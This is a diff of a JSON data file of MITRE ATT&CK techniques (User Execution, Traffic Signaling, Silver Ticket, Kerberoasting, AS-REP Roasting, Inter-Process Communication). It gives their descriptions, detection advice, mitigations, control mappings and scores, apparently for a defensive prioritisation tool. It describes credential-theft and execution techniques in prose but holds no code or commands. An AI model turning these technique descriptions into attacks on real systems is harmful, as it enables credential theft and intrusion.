-                "url": "https://attack.mitre.org/mitigations/M1050"
+                "mid": "M1026",
+                "name": "Privileged Account Management",
+                "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.",
+                "url": "https://attack.mitre.org/mitigations/M1026"
             }
         ],
-        "cumulative_score": 0.588021040952381,
-        "adjusted_score": 0.588021040952381,
+        "cumulative_score": 0.27142857142857146,
+        "adjusted_score": 0.27142857142857146,
         "has_car": false,
-        "has_sigma": true,
-        "has_es_siem": true,
-        "has_splunk": true,
-        "cis_controls": [],
+        "has_sigma": false,
+        "has_es_siem": false,
+        "has_splunk": false,
+        "cis_controls": [
+            "4.1",
+            "4.7",
+            "5.3",
+            "5.4",
+            "6.1",
+            "6.2",
+            "6.8",
+            "18.3",
+            "18.5"
+        ],
         "nist_controls": [
-            "AC-4",
+            "AC-2",
+            "AC-3",
+            "AC-5",
             "AC-6",
-            "CA-7",
-            "CM-8",
-            "SC-18",
-            "SC-2",
-            "SC-29",
-            "SC-3",
-            "SC-30",
-            "SC-39",
-            "SC-44",
-            "SC-7",
-            "SI-3",
-            "SI-4",
-            "SI-7"
+            "CM-2",
+            "CM-5",
+            "CM-6",
+            "IA-2",
+            "IA-5"
         ],
-        "process_coverage": true,
+        "process_coverage": false,
         "network_coverage": false,
         "file_coverage": true,
         "cloud_coverage": false,
-        "hardware_coverage": false,
-        "actionability_score": {
-            "combined_score": 0.28095238095238095,
-            "mitigation_score": 0.2909090909090909,
-            "detection_score": 0.27
-        },
-        "choke_point_score": 0.3,
-        "prevalence_score": 0.00706866
+        "hardware_coverage": false
     },
     {
-        "tid": "T1204",
-        "name": "User Execution",
-        "description": "An adversary may rely upon specific actions by a user in order to gain execution. Users may be subjected to social engineering to get them to execute malicious code by, for example, opening a malicious document file or link. These user actions will typically be observed as follow-on behavior from forms of [Phishing](https://attack.mitre.org/techniques/T1566).\n\nWhile [User Execution](https://attack.mitre.org/techniques/T1204) frequently occurs shortly after Initial Access it may occur at other phases of an intrusion, such as when an adversary places a file in a shared directory or on a user's desktop hoping that a user will click on it. This activity may also be seen shortly after [Internal Spearphishing](https://attack.mitre.org/techniques/T1534).",
-        "url": "https://attack.mitre.org/techniques/T1204",
+        "tid": "T1558.002",
+        "name": "Steal or Forge Kerberos Tickets: Silver Ticket",
+        "description": "Adversaries who have the password hash of a target service account (e.g. SharePoint, MSSQL) may forge Kerberos ticket granting service (TGS) tickets, also known as silver tickets. Kerberos TGS tickets are also known as service tickets.(Citation: ADSecurity Silver Tickets)\n\nSilver tickets are more limited in scope in than golden tickets in that they only enable adversaries to access a particular resource (e.g. MSSQL) and the system that hosts the resource; however, unlike golden tickets, adversaries with the ability to forge silver tickets are able to create TGS tickets without interacting with the Key Distribution Center (KDC), potentially making detection more difficult.(Citation: ADSecurity Detecting Forged Tickets)\n\nPassword hashes for target services may be obtained using [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) or [Kerberoasting](https://attack.mitre.org/techniques/T1558/003).",
+        "url": "https://attack.mitre.org/techniques/T1558/002",
         "tactics": [
-            "Execution"
+            "Credential Access"
         ],
-        "detection": "Monitor the execution of and command-line arguments for applications that may be used by an adversary to gain Initial Access that require user interaction. This includes compression applications, such as those for zip files, that can be used to [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140) in payloads.\n\nAnti-virus can potentially detect malicious documents and files that are downloaded and executed on the user's computer. Endpoint sensing or network sensing can potentially detect malicious events once the file is opened (such as a Microsoft Word document or PDF reaching out to the internet or spawning powershell.exe).",
+        "detection": "Monitor for anomalous Kerberos activity, such as malformed or blank fields in Windows logon/logoff events (Event ID 4624, 4634, 4672).(Citation: ADSecurity Detecting Forged Tickets) \n\nMonitor for unexpected processes interacting with lsass.exe.(Citation: Medium Detecting Attempts to Steal Passwords from Memory) Common credential dumpers such as Mimikatz access the LSA Subsystem Service (LSASS) process by opening the process, locating the LSA secrets key, and decrypting the sections in memory where credential details, including Kerberos tickets, are stored.",
         "platforms": [
-            "Containers",
-            "IaaS",
-            "Linux",
-            "Windows",
-            "macOS"
+            "Windows"
         ],
         "data_sources": [
-            "Application Log: Application Log Content",
-            "Command: Command Execution",
-            "Container: Container Creation",
-            "Container: Container Start",
-            "File: File Creation",
-            "Image: Image Creation",
-            "Instance: Instance Creation",
-            "Instance: Instance Start",
-            "Network Traffic: Network Connection Creation",
-            "Network Traffic: Network Traffic Content",
-            "Process: Process Creation"
+            "Logon Session: Logon Session Metadata"
         ],
-        "is_subtechnique": false,
-        "supertechnique": null,
-        "subtechniques": [
+        "is_subtechnique": true,
+        "supertechnique": "T1558",
+        "subtechniques": [],
+        "mitigations": [
             {
-                "tid": "T1204.001",
-                "name": "User Execution: Malicious Link",
-                "url": "https://attack.mitre.org/techniques/T1204/001",
-                "description": "An adversary may rely upon a user clicking a malicious link in order to gain execution. Users may be subjected to social engineering to get them to click on a link that will lead to code execution. This user action will typically be observed as follow-on behavior from [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002). Clicking on a link may also lead to other execution techniques such as exploitation of a browser or application vulnerability via [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203). Links may also lead users to download files that require execution via [Malicious File](https://attack.mitre.org/techniques/T1204/002).",
-                "detection": "Inspect network traffic for indications that a user visited a malicious site, such as links included in phishing campaigns directed at your organization.\n\nAnti-virus can potentially detect malicious documents and files that are downloaded from a link and executed on the user's computer.",
-                "mitigations": [
-                    {
-                        "mid": "M1031",
-                        "name": "Network Intrusion Prevention",
-                        "description": "Use intrusion detection signatures to block traffic at network boundaries.",
-                        "url": "https://attack.mitre.org/mitigations/M1031"
-                    },
-                    {
-                        "mid": "M1021",
-                        "name": "Restrict Web-Based Content",
-                        "description": "Restrict use of certain websites, block downloads/attachments, block Javascript, restrict browser extensions, etc.",
-                        "url": "https://attack.mitre.org/mitigations/M1021"
-                    },
-                    {
-                        "mid": "M1017",
-                        "name": "User Training",
-                        "description": "Train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction.",
-                        "url": "https://attack.mitre.org/mitigations/M1017"
-                    }
-                ]
+                "mid": "M1041",
+                "name": "Encrypt Sensitive Information",
+                "description": "Protect sensitive information with strong encryption.",
+                "url": "https://attack.mitre.org/mitigations/M1041"
             },
             {
-                "tid": "T1204.002",
-                "name": "User Execution: Malicious File",
-                "url": "https://attack.mitre.org/techniques/T1204/002",
-                "description": "An adversary may rely upon a user opening a malicious file in order to gain execution. Users may be subjected to social engineering to get them to open a file that will lead to code execution. This user action will typically be observed as follow-on behavior from [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001). Adversaries may use several types of files that require a user to execute them, including .doc, .pdf, .xls, .rtf, .scr, .exe, .lnk, .pif, and .cpl.\n\nAdversaries may employ various forms of [Masquerading](https://attack.mitre.org/techniques/T1036) on the file to increase the likelihood that a user will open it.\n\nWhile [Malicious File](https://attack.mitre.org/techniques/T1204/002) frequently occurs shortly after Initial Access it may occur at other phases of an intrusion, such as when an adversary places a file in a shared directory or on a user's desktop hoping that a user will click on it. This activity may also be seen shortly after [Internal Spearphishing](https://attack.mitre.org/techniques/T1534).",
-                "detection": "Monitor the execution of and command-line arguments for applications that may be used by an adversary to gain initial access that require user interaction. This includes compression applications, such as those for zip files, that can be used to [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140) in payloads.\n\nAnti-virus can potentially detect malicious documents and files that are downloaded and executed on the user's computer. Endpoint sensing or network sensing can potentially detect malicious events once the file is opened (such as a Microsoft Word document or PDF reaching out to the internet or spawning powershell.exe).",
-                "mitigations": [
-                    {
-                        "mid": "M1040",
-                        "name": "Behavior Prevention on Endpoint",
-                        "description": "Use capabilities to prevent suspicious behavior patterns from occurring on endpoint systems. This could include suspicious process, file, API call, etc. behavior.",
-                        "url": "https://attack.mitre.org/mitigations/M1040"
-                    },
-                    {
-                        "mid": "M1038",
-                        "name": "Execution Prevention",
-                        "description": "Block execution of code on a system through application control, and/or script blocking.",
-                        "url": "https://attack.mitre.org/mitigations/M1038"
-                    },
-                    {
-                        "mid": "M1017",
-                        "name": "User Training",
-                        "description": "Train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction.",
-                        "url": "https://attack.mitre.org/mitigations/M1017"
-                    }
-                ]
+                "mid": "M1027",
+                "name": "Password Policies",
+                "description": "Set and enforce secure password policies for accounts.",
+                "url": "https://attack.mitre.org/mitigations/M1027"
             },
             {
-                "tid": "T1204.003",
-                "name": "User Execution: Malicious Image",
-                "url": "https://attack.mitre.org/techniques/T1204/003",
-                "description": "Adversaries may rely on a user running a malicious image to facilitate execution. Amazon Web Services (AWS) Amazon Machine Images (AMIs), Google Cloud Platform (GCP) Images, and Azure Images as well as popular container runtimes such as Docker can be backdoored. Backdoored images may be uploaded to a public repository via [Upload Malware](https://attack.mitre.org/techniques/T1608/001), and users may then download and deploy an instance or container from the image without realizing the image is malicious, thus bypassing techniques that specifically achieve Initial Access. This can lead to the execution of malicious code, such as code that executes cryptocurrency mining, in the instance or container.(Citation: Summit Route Malicious AMIs)\n\nAdversaries may also name images a certain way to increase the chance of users mistakenly deploying an instance or container from the image (ex: [Match Legitimate Name or Location](https://attack.mitre.org/techniques/T1036/005)).(Citation: Aqua Security Cloud Native Threat Report June 2021)",
-                "detection": "Monitor the local image registry to make sure malicious images are not added. Track the deployment of new containers, especially from newly built images. Monitor the behavior of containers within the environment to detect anomalous behavior or malicious activity after users deploy from malicious images.",
-                "mitigations": [
-                    {
-                        "mid": "M1047",
-                        "name": "Audit",
-                        "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.",
-                        "url": "https://attack.mitre.org/mitigations/M1047"
-                    },
-                    {
-                        "mid": "M1045",
-                        "name": "Code Signing",
-                        "description": "Enforce binary and application integrity with digital signature verification to prevent untrusted code from executing.",
-                        "url": "https://attack.mitre.org/mitigations/M1045"
-                    },
-                    {
-                        "mid": "M1031",
-                        "name": "Network Intrusion Prevention",
-                        "description": "Use intrusion detection signatures to block traffic at network boundaries.",
-                        "url": "https://attack.mitre.org/mitigations/M1031"
-                    },
-                    {
-                        "mid": "M1017",
-                        "name": "User Training",
-                        "description": "Train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction.",
-                        "url": "https://attack.mitre.org/mitigations/M1017"
-                    }
-                ]
+                "mid": "M1026",
+                "name": "Privileged Account Management",
+                "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.",
+                "url": "https://attack.mitre.org/mitigations/M1026"
             }
         ],
+        "cumulative_score": 0.45238095238095244,
+        "adjusted_score": 0.45238095238095244,
+        "has_car": false,
+        "has_sigma": true,
+        "has_es_siem": true,
+        "has_splunk": true,
+        "cis_controls": [
+            "4.1",
+            "4.7",
+            "5.2",
+            "5.3",
+            "5.4",
+            "5.5",
+            "6.8",
+            "3.10"
+        ],
+        "nist_controls": [
+            "AC-16",
+            "AC-17",
+            "AC-18",
+            "AC-19",
+            "AC-2",
+            "AC-3",
+            "AC-5",
+            "AC-6",
+            "CA-7",
+            "CM-2",
+            "CM-5",
+            "CM-6",
+            "IA-2",
+            "IA-5",
+            "SC-4",
+            "SI-12",
+            "SI-3",
+            "SI-4",
+            "SI-7"
+        ],
+        "process_coverage": false,
+        "network_coverage": false,
+        "file_coverage": true,
+        "cloud_coverage": false,
+        "hardware_coverage": false
+    },
+    {
+        "tid": "T1558.003",
+        "name": "Steal or Forge Kerberos Tickets: Kerberoasting",
+        "description": "Adversaries may abuse a valid Kerberos ticket-granting ticket (TGT) or sniff network traffic to obtain a ticket-granting service (TGS) ticket that may be vulnerable to [Brute Force](https://attack.mitre.org/techniques/T1110).(Citation: Empire InvokeKerberoast Oct 2016)(Citation: AdSecurity Cracking Kerberos Dec 2015) \n\nService principal names (SPNs) are used to uniquely identify each instance of a Windows service. To enable authentication, Kerberos requires that SPNs be associated with at least one service logon account (an account specifically tasked with running a service(Citation: Microsoft Detecting Kerberoasting Feb 2018)).(Citation: Microsoft SPN)(Citation: Microsoft SetSPN)(Citation: SANS Attacking Kerberos Nov 2014)(Citation: Harmj0y Kerberoast Nov 2016)\n\nAdversaries possessing a valid Kerberos ticket-granting ticket (TGT) may request one or more Kerberos ticket-granting service (TGS) service tickets for any SPN from a domain controller (DC).(Citation: Empire InvokeKerberoast Oct 2016)(Citation: AdSecurity Cracking Kerberos Dec 2015) Portions of these tickets may be encrypted with the RC4 algorithm, meaning the Kerberos 5 TGS-REP etype 23 hash of the service account associated with the SPN is used as the private key and is thus vulnerable to offline [Brute Force](https://attack.mitre.org/techniques/T1110) attacks that may expose plaintext credentials.(Citation: AdSecurity Cracking Kerberos Dec 2015)(Citation: Empire InvokeKerberoast Oct 2016) (Citation: Harmj0y Kerberoast Nov 2016)\n\nThis same attack could be executed using service tickets captured from network traffic.(Citation: AdSecurity Cracking Kerberos Dec 2015)\n\nCracked hashes may enable [Persistence](https://attack.mitre.org/tactics/TA0003), [Privilege Escalation](https://attack.mitre.org/tactics/TA0004), and [Lateral Movement](https://attack.mitre.org/tactics/TA0008) via access to [Valid Accounts](https://attack.mitre.org/techniques/T1078).(Citation: SANS Attacking Kerberos Nov 2014)",
+        "url": "https://attack.mitre.org/techniques/T1558/003",
+        "tactics": [
+            "Credential Access"
+        ],
+        "detection": "Enable Audit Kerberos Service Ticket Operations to log Kerberos TGS service ticket requests. Particularly investigate irregular patterns of activity (ex: accounts making numerous requests, Event ID 4769, within a small time frame, especially if they also request RC4 encryption [Type 0x17]).(Citation: Microsoft Detecting Kerberoasting Feb 2018)(Citation: AdSecurity Cracking Kerberos Dec 2015)",
+        "platforms": [
+            "Windows"
+        ],
+        "data_sources": [
+            "Active Directory: Active Directory Credential Request"
+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1558",
+        "subtechniques": [],
         "mitigations": [
             {
-                "mid": "M1040",
-                "name": "Behavior Prevention on Endpoint",
-                "description": "Use capabilities to prevent suspicious behavior patterns from occurring on endpoint systems. This could include suspicious process, file, API call, etc. behavior.",
-                "url": "https://attack.mitre.org/mitigations/M1040"
+                "mid": "M1041",
+                "name": "Encrypt Sensitive Information",
+                "description": "Protect sensitive information with strong encryption.",
+                "url": "https://attack.mitre.org/mitigations/M1041"
             },
             {
-                "mid": "M1038",
-                "name": "Execution Prevention",
-                "description": "Block execution of code on a system through application control, and/or script blocking.",
-                "url": "https://attack.mitre.org/mitigations/M1038"
+                "mid": "M1027",
+                "name": "Password Policies",
+                "description": "Set and enforce secure password policies for accounts.",
+                "url": "https://attack.mitre.org/mitigations/M1027"
             },
             {
-                "mid": "M1031",
-                "name": "Network Intrusion Prevention",
-                "description": "Use intrusion detection signatures to block traffic at network boundaries.",
-                "url": "https://attack.mitre.org/mitigations/M1031"
+                "mid": "M1026",
+                "name": "Privileged Account Management",
+                "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.",
+                "url": "https://attack.mitre.org/mitigations/M1026"
+            }
+        ],
+        "cumulative_score": 0.39047619047619053,
+        "adjusted_score": 0.39047619047619053,
+        "has_car": false,
+        "has_sigma": false,
+        "has_es_siem": false,
+        "has_splunk": true,
+        "cis_controls": [
+            "4.1",
+            "4.7",
+            "5.2",
+            "5.3",
+            "5.4",
+            "5.5",
+            "6.8",
+            "3.10"
+        ],
+        "nist_controls": [
+            "AC-16",
+            "AC-17",
+            "AC-18",
+            "AC-19",
+            "AC-2",
+            "AC-3",
+            "AC-5",
+            "AC-6",
+            "CA-7",
+            "CM-2",
+            "CM-5",
+            "CM-6",
+            "IA-2",
+            "IA-5",
+            "SC-4",
+            "SI-12",
+            "SI-3",
+            "SI-4",
+            "SI-7"
+        ],
+        "process_coverage": false,
+        "network_coverage": false,
+        "file_coverage": true,
+        "cloud_coverage": false,
+        "hardware_coverage": false
+    },
+    {
+        "tid": "T1558.004",
+        "name": "Steal or Forge Kerberos Tickets: AS-REP Roasting",
+        "description": "Adversaries may reveal credentials of accounts that have disabled Kerberos preauthentication by [Password Cracking](https://attack.mitre.org/techniques/T1110/002) Kerberos messages.(Citation: Harmj0y Roasting AS-REPs Jan 2017) \n\nPreauthentication offers protection against offline [Password Cracking](https://attack.mitre.org/techniques/T1110/002). When enabled, a user requesting access to a resource initiates communication with the Domain Controller (DC) by sending an Authentication Server Request (AS-REQ) message with a timestamp that is encrypted with the hash of their password. If and only if the DC is able to successfully decrypt the timestamp with the hash of the user’s password, it will then send an Authentication Server Response (AS-REP) message that contains the Ticket Granting Ticket (TGT) to the user. Part of the AS-REP message is signed with the user’s password.(Citation: Microsoft Kerberos Preauth 2014)\n\nFor each account found without preauthentication, an adversary may send an AS-REQ message without the encrypted timestamp and receive an AS-REP message with TGT data which may be encrypted with an insecure algorithm such as RC4. The recovered encrypted data may be vulnerable to offline [Password Cracking](https://attack.mitre.org/techniques/T1110/002) attacks similarly to [Kerberoasting](https://attack.mitre.org/techniques/T1558/003) and expose plaintext credentials. (Citation: Harmj0y Roasting AS-REPs Jan 2017)(Citation: Stealthbits Cracking AS-REP Roasting Jun 2019) \n\nAn account registered to a domain, with or without special privileges, can be abused to list all domain accounts that have preauthentication disabled by utilizing Windows tools like [PowerShell](https://attack.mitre.org/techniques/T1059/001) with an LDAP filter. Alternatively, the adversary may send an AS-REQ message for each user. If the DC responds without errors, the account does not require preauthentication and the AS-REP message will already contain the encrypted data. (Citation: Harmj0y Roasting AS-REPs Jan 2017)(Citation: Stealthbits Cracking AS-REP Roasting Jun 2019)\n\nCracked hashes may enable [Persistence](https://attack.mitre.org/tactics/TA0003), [Privilege Escalation](https://attack.mitre.org/tactics/TA0004), and [Lateral Movement](https://attack.mitre.org/tactics/TA0008) via access to [Valid Accounts](https://attack.mitre.org/techniques/T1078).(Citation: SANS Attacking Kerberos Nov 2014)",
+        "url": "https://attack.mitre.org/techniques/T1558/004",
+        "tactics": [
+            "Credential Access"
+        ],
+        "detection": "Enable Audit Kerberos Service Ticket Operations to log Kerberos TGS service ticket requests. Particularly investigate irregular patterns of activity (ex: accounts making numerous requests, Event ID 4768 and 4769, within a small time frame, especially if they also request RC4 encryption [Type 0x17], pre-authentication not required [Type: 0x0]).(Citation: AdSecurity Cracking Kerberos Dec 2015)(Citation: Microsoft Detecting Kerberoasting Feb 2018)(Citation: Microsoft 4768 TGT 2017)",
+        "platforms": [
+            "Windows"
+        ],
+        "data_sources": [
+            "Active Directory: Active Directory Credential Request"
+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1558",
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1047",
+                "name": "Audit",
+                "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.",
+                "url": "https://attack.mitre.org/mitigations/M1047"
             },
             {
-                "mid": "M1021",
-                "name": "Restrict Web-Based Content",
-                "description": "Restrict use of certain websites, block downloads/attachments, block Javascript, restrict browser extensions, etc.",
-                "url": "https://attack.mitre.org/mitigations/M1021"
+                "mid": "M1041",
+                "name": "Encrypt Sensitive Information",
+                "description": "Protect sensitive information with strong encryption.",
+                "url": "https://attack.mitre.org/mitigations/M1041"
             },
             {
-                "mid": "M1017",
-                "name": "User Training",
-                "description": "Train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction.",
-                "url": "https://attack.mitre.org/mitigations/M1017"
+                "mid": "M1027",
+                "name": "Password Policies",
+                "description": "Set and enforce secure password policies for accounts.",
+                "url": "https://attack.mitre.org/mitigations/M1027"
             }
         ],
-        "cumulative_score": 1.3118113519047618,
-        "adjusted_score": 1.3118113519047618,
+        "cumulative_score": 0.36190476190476195,
+        "adjusted_score": 0.36190476190476195,
         "has_car": false,
         "has_sigma": true,
         "has_es_siem": true,
-        "has_splunk": true,
+        "has_splunk": false,
         "cis_controls": [
-            "2.3",
-            "2.5",
-            "2.7",
-            "9.3",
-            "9.6",
-            "13.3",
-            "13.8",
-            "14.1",
-            "14.2",
-            "14.6"
+            "4.1",
+            "4.7",
+            "5.2",
+            "18.3",
+            "18.5",
+            "3.10"
         ],
         "nist_controls": [
-            "AC-4",
+            "AC-16",
+            "AC-17",
+            "AC-18",
+            "AC-19",
+            "AC-2",
+            "AC-3",
             "CA-7",
+            "CA-8",
             "CM-2",
             "CM-6",
-            "CM-7",
-            "SC-44",
-            "SC-7",
-            "SI-10",
-            "SI-2",
+            "IA-2",
+            "IA-5",
+            "RA-5",
+            "SA-11",
+            "SA-15",
+            "SC-4",
+            "SI-12",
             "SI-3",
             "SI-4",
-            "SI-7",
-            "SI-8"
+            "SI-7"
         ],
-        "process_coverage": true,
-        "network_coverage": true,
+        "process_coverage": false,
+        "network_coverage": false,
         "file_coverage": true,
-        "cloud_coverage": true,
-        "hardware_coverage": false,
-        "actionability_score": {
-            "combined_score": 0.3619047619047619,
-            "mitigation_score": 0.41818181818181815,
-            "detection_score": 0.3
-        },
-        "choke_point_score": 0.4,
-        "prevalence_score": 0.54990659
+        "cloud_coverage": false,
+        "hardware_coverage": false
     },
     {
-        "tid": "T1205",
-        "name": "Traffic Signaling",
-        "description": "Adversaries may use traffic signaling to hide open ports or other malicious functionality used for persistence or command and control. Traffic signaling involves the use of a magic value or sequence that must be sent to a system to trigger a special response, such as opening a closed port or executing a malicious task. This may take the form of sending a series of packets with certain characteristics before a port will be opened that the adversary can use for command and control. Usually this series of packets consists of attempted connections to a predefined sequence of closed ports (i.e. [Port Knocking](https://attack.mitre.org/techniques/T1205/001)), but can involve unusual flags, specific strings, or other unique characteristics. After the sequence is completed, opening a port may be accomplished by the host-based firewall, but could also be implemented by custom software.\n\nAdversaries may also communicate with an already open port, but the service listening on that port will only respond to commands or trigger other malicious functionality if passed the appropriate magic value(s).\n\nThe observation of the signal packets to trigger the communication can be conducted through different methods. One means, originally implemented by Cd00r (Citation: Hartrell cd00r 2002), is to use the libpcap libraries to sniff for the packets in question. Another method leverages raw sockets, which enables the malware to use ports that are already open for use by other programs.\n\nOn network devices, adversaries may use crafted packets to enable [Network Device Authentication](https://attack.mitre.org/techniques/T1556/004) for standard services offered by the device such as telnet.  Such signaling may also be used to open a closed service port such as telnet, or to trigger module modification of malware implants on the device, adding, removing, or changing malicious capabilities.(Citation: Cisco Synful Knock Evolution) (Citation: FireEye - Synful Knock) (Citation: Cisco Blog Legacy Device Attacks)  To enable this traffic signaling on embedded devices, adversaries must first achieve and leverage [Patch System Image](https://attack.mitre.org/techniques/T1601/001) due to the monolithic nature of the architecture.\n\nAdversaries may also use the Wake-on-LAN feature to turn on powered off systems. Wake-on-LAN is a hardware feature that allows a powered down system to be powered on, or woken up, by sending a magic packet to it. Once the system is powered on, it may become a target for lateral movement.(Citation: Bleeping Computer - Ryuk WoL) (Citation: AMD Magic Packet)",
-        "url": "https://attack.mitre.org/techniques/T1205",
+        "tid": "T1559",
+        "name": "Inter-Process Communication",
+        "description": "Adversaries may abuse inter-process communication (IPC) mechanisms for local code or command execution. IPC is typically used by processes to share data, communicate with each other, or synchronize execution. IPC is also commonly used to avoid situations such as deadlocks, which occurs when processes are stuck in a cyclic waiting pattern. \n\nAdversaries may abuse IPC to execute arbitrary code or commands. IPC mechanisms may differ depending on OS, but typically exists in a form accessible through programming languages/libraries or native interfaces such as Windows [Dynamic Data Exchange](https://attack.mitre.org/techniques/T1559/002) or [Component Object Model](https://attack.mitre.org/techniques/T1559/001). Higher level execution mediums, such as those of [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059)s, may also leverage underlying IPC mechanisms. Adversaries may also use [Remote Services](https://attack.mitre.org/techniques/T1021) such as [Distributed Component Object Model](https://attack.mitre.org/techniques/T1021/003) to facilitate remote IPC execution.(Citation: Fireeye Hunting COM June 2019)",
+        "url": "https://attack.mitre.org/techniques/T1559",
         "tactics": [
-            "Command And Control",
-            "Defense Evasion",
-            "Persistence"
+            "Execution"
         ],
-        "detection": "Record network packets sent to and from the system, looking for extraneous packets that do not belong to established flows.\n\nThe Wake-on-LAN magic packet consists of 6 bytes of FF followed by sixteen repetitions of the target system's IEEE address. Seeing this string anywhere in a packet's payload may be indicative of a Wake-on-LAN attempt.(Citation: GitLab WakeOnLAN)",
+        "detection": "Monitor for strings in files/commands, loaded DLLs/libraries, or spawned processes that are associated with abuse of IPC mechanisms.",
         "platforms": [
-            "Linux",
-            "Network",
             "Windows",
             "macOS"
         ],
         "data_sources": [
-            "Network Traffic: Network Connection Creation",
-            "Network Traffic: Network Traffic Content",
-            "Network Traffic: Network Traffic Flow"
+            "Module: Module Load",
+            "Process: Process Creation",
+            "Script: Script Execution"
         ],
         "is_subtechnique": false,
         "supertechnique": null,
         "subtechniques": [
             {
-                "tid": "T1205.001",
-                "name": "Traffic Signaling: Port Knocking",
-                "url": "https://attack.mitre.org/techniques/T1205/001",
-                "description": "Adversaries may use port knocking to hide open ports used for persistence or command and control. To enable a port, an adversary sends a series of attempted connections to a predefined sequence of closed ports. After the sequence is completed, opening a port is often accomplished by the host based firewall, but could also be implemented by custom software.\n\nThis technique has been observed to both for the dynamic opening of a listening port as well as the initiating of a connection to a listening server on a different system.\n\nThe observation of the signal packets to trigger the communication can be conducted through different methods. One means, originally implemented by Cd00r (Citation: Hartrell cd00r 2002), is to use the libpcap libraries to sniff for the packets in question. Another method leverages raw sockets, which enables the malware to use ports that are already open for use by other programs.",
-                "detection": "Record network packets sent to and from the system, looking for extraneous packets that do not belong to established flows.",
+                "tid": "T1559.001",
+                "name": "Inter-Process Communication: Component Object Model",
+                "url": "https://attack.mitre.org/techniques/T1559/001",
+                "description": "Adversaries may use the Windows Component Object Model (COM) for local code execution. COM is an inter-process communication (IPC) component of the native Windows application programming interface (API) that enables interaction between software objects, or executable code that implements one or more interfaces.(Citation: Fireeye Hunting COM June 2019) Through COM, a client object can call methods of server objects, which are typically binary Dynamic Link Libraries (DLL) or executables (EXE).(Citation: Microsoft COM) Remote COM execution is facilitated by [Remote Services](https://attack.mitre.org/techniques/T1021) such as  [Distributed Component Object Model](https://attack.mitre.org/techniques/T1021/003) (DCOM).(Citation: Fireeye Hunting COM June 2019)\n\nVarious COM interfaces are exposed that can be abused to invoke arbitrary execution via a variety of programming languages such as C, C++, Java, and [Visual Basic](https://attack.mitre.org/techniques/T1059/005).(Citation: Microsoft COM) Specific COM objects also exist to directly perform functions beyond code execution, such as creating a [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053), fileless download/execution, and other adversary behaviors related to privilege escalation and persistence.(Citation: Fireeye Hunting COM June 2019)(Citation: ProjectZero File Write EoP Apr 2018)",
+                "detection": "Monitor for COM objects loading DLLs and other modules not typically associated with the application.(Citation: Enigma Outlook DCOM Lateral Movement Nov 2017) Enumeration of COM objects, via [Query Registry](https://attack.mitre.org/techniques/T1012) or [PowerShell](https://attack.mitre.org/techniques/T1059/001), may also proceed malicious use.(Citation: Fireeye Hunting COM June 2019)(Citation: Enigma MMC20 COM Jan 2017)\n\nMonitor for spawning of processes associated with COM objects, especially those invoked by a user different than the one currently logged on. ",
+                "mitigations": [
+                    {
+                        "mid": "M1048",
+                        "name": "Application Isolation and Sandboxing",
+                        "description": "Restrict execution of code to a virtual environment on or in transit to an endpoint system.",
+                        "url": "https://attack.mitre.org/mitigations/M1048"
+                    },
+                    {
+                        "mid": "M1026",
+                        "name": "Privileged Account Management",
+                        "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.",
+                        "url": "https://attack.mitre.org/mitigations/M1026"
+                    }
+                ]
+            },
+            {
+                "tid": "T1559.002",
+                "name": "Inter-Process Communication: Dynamic Data Exchange",
+                "url": "https://attack.mitre.org/techniques/T1559/002",
+                "description": "Adversaries may use Windows Dynamic Data Exchange (DDE) to execute arbitrary commands. DDE is a client-server protocol for one-time and/or continuous inter-process communication (IPC) between applications. Once a link is established, applications can autonomously exchange transactions consisting of strings, warm data links (notifications when a data item changes), hot data links (duplications of changes to a data item), and requests for command execution.\n\nObject Linking and Embedding (OLE), or the ability to link data between documents, was originally implemented through DDE. Despite being superseded by [Component Object Model](https://attack.mitre.org/techniques/T1559/001), DDE may be enabled in Windows 10 and most of Microsoft Office 2016 via Registry keys. (Citation: BleepingComputer DDE Disabled in Word Dec 2017) (Citation: Microsoft ADV170021 Dec 2017) (Citation: Microsoft DDE Advisory Nov 2017)\n\nMicrosoft Office documents can be poisoned with DDE commands (Citation: SensePost PS DDE May 2016) (Citation: Kettle CSV DDE Aug 2014), directly or through embedded files (Citation: Enigma Reviving DDE Jan 2018), and used to deliver execution via [Phishing](https://attack.mitre.org/techniques/T1566) campaigns or hosted Web content, avoiding the use of Visual Basic for Applications (VBA) macros. (Citation: SensePost MacroLess DDE Oct 2017) DDE could also be leveraged by an adversary operating on a compromised machine who does not have direct access to a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059). DDE execution can be invoked remotely via [Remote Services](https://attack.mitre.org/techniques/T1021) such as [Distributed Component Object Model](https://attack.mitre.org/techniques/T1021/003) (DCOM).(Citation: Fireeye Hunting COM June 2019)",
+                "detection": "Monitor processes for abnormal behavior indicative of DDE abuse, such as Microsoft Office applications loading DLLs and other modules not typically associated with the application or these applications spawning unusual processes (such as cmd.exe).\n\nOLE and Office Open XML files can be scanned for ‘DDEAUTO', ‘DDE’, and other strings indicative of DDE execution.(Citation: NVisio Labs DDE Detection Oct 2017)",
                 "mitigations": [
                     {
-                        "mid": "M1037",
-                        "name": "Filter Network Traffic",
-                        "description": "Use network appliances to filter ingress or egress traffic and perform protocol-based filtering. Configure software on endpoints to filter network traffic.",
-                        "url": "https://attack.mitre.org/mitigations/M1037"
